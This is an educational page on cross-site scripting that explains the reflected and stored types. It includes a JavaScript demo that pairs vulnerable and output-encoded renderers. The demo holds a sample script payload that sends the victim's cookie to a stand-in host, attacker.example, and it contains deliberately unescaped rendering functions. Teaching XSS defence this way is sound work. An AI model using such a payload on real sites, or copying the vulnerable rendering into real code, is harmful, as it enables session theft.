XSS (Cross-site scripting attacks)

background

1. By finding a way to inject script into a web page served by a site the victim trusts, an attacker gets that script executed in the victim's browser under the trusted site's origin, and can therefore read sensitive page content, session cookies, and other information the browser keeps on behalf of the user. Cross-site scripting is a form of code injection.

types

Non-persistent (reflected)

  1. These vulnerabilities occur when a server-side script immediately uses data supplied by the web client (most commonly HTTP query parameters, for example from an HTML form submission) to build the result page and returns it without sanitising that data first.
  2. Any unvalidated user-supplied data that is included in the result page without proper HTML encoding can lead to markup injection. [12] [13] A classic example of a potential vector is a site search: the search string is typically redisplayed verbatim on the results page to show what was searched for. If that response does not correctly escape or reject HTML control characters, a cross-site scripting defect exists.
  3. Reflected attacks are usually delivered by email or through a third-party website. The bait is an innocent-looking URL that points to a trusted site but carries an XSS vector in one of its parameters. If the trusted site is vulnerable to a reflected attack, clicking the link causes the victim's browser to execute the injected script in that site's context.

Persistent (or stored)

  1. Here the data supplied by the attacker is saved by the server and later displayed, without proper HTML escaping, inside "normal" pages that other users receive during ordinary browsing. A typical example is an online message board that lets users post messages in HTML format for other users to read. Because the payload is served to everyone who views the page, no crafted link has to be delivered to each victim.
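The two cases above, reflected and stored, differ only in where the attacker-controlled string comes from (the request versus the database); the defect and the fix are the same: encode the value at output time for the HTML context it lands in. The following is an added example written for this page, not code from the original text or from any real site. The render functions, the in-memory "message board" and the attacker payload are all constructed for illustration, and the URL in the comment is hypothetical.

```javascript
// Added example (not from the original page): a minimal model of reflected and
// stored XSS, side by side with the output-encoding fix that closes both.

// Encode the five characters that are significant in an HTML text or
// double/single-quoted attribute context. This is NOT sufficient for values
// placed inside <script> blocks, inline event handlers or URLs, which need
// their own context-specific encoding.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// --- Reflected (non-persistent): the search string is echoed straight back ---

// Vulnerable: the query parameter is interpolated verbatim into the response.
function renderSearchVulnerable(q) {
  return `<p>You searched for: ${q}</p>`;
}

// Fixed: identical page, but the user-controlled value is HTML-encoded first.
function renderSearchFixed(q) {
  return `<p>You searched for: ${escapeHtml(q)}</p>`;
}

// --- Stored (persistent): attacker data is saved, then shown to other users ---

// createBoard() stands in for a message board backed by a server-side database.
function createBoard() {
  const messages = []; // stored exactly as submitted, as a real DB would

  return {
    post(author, body) {
      messages.push({ author, body });
    },
    // Vulnerable rendering: stored HTML is emitted raw to every later visitor.
    renderVulnerable() {
      return messages.map(m => `<li><b>${m.author}</b>: ${m.body}</li>`).join("");
    },
    // Fixed rendering: encode at output time, whatever was stored.
    renderFixed() {
      return messages
        .map(m => `<li><b>${escapeHtml(m.author)}</b>: ${escapeHtml(m.body)}</li>`)
        .join("");
    },
  };
}

// Constructed attacker payload, as it might arrive in a crafted link such as
// https://trusted.example/search?q=<payload> (hypothetical URL) or in a
// message-board post. It exfiltrates the document cookie to the attacker.
const PAYLOAD =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

// Crude check of the kind a unit test or scanner uses: did a raw <script>
// tag survive into the response?
function containsRawScript(html) {
  return /<script\b/i.test(html);
}

// Walk through both scenarios and return the outcome of each.
function demo() {
  const board = createBoard();
  board.post("mallory", PAYLOAD);
  board.post("alice", "Hello <everyone>");

  return {
    reflectedVulnerable: containsRawScript(renderSearchVulnerable(PAYLOAD)),
    reflectedFixed: containsRawScript(renderSearchFixed(PAYLOAD)),
    storedVulnerable: containsRawScript(board.renderVulnerable()),
    storedFixed: containsRawScript(board.renderFixed()),
  };
}

console.log(demo());
// expected: { reflectedVulnerable: true, reflectedFixed: false,
//             storedVulnerable: true, storedFixed: false }
```

Note that the stored case is fixed in the renderer, not by "cleaning" the data on the way into the database: encoding at output time protects every page that later displays the value, while input filtering alone is bypassed as soon as the same data reaches a second output path.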

Server-side and DOM-based vulnerabilities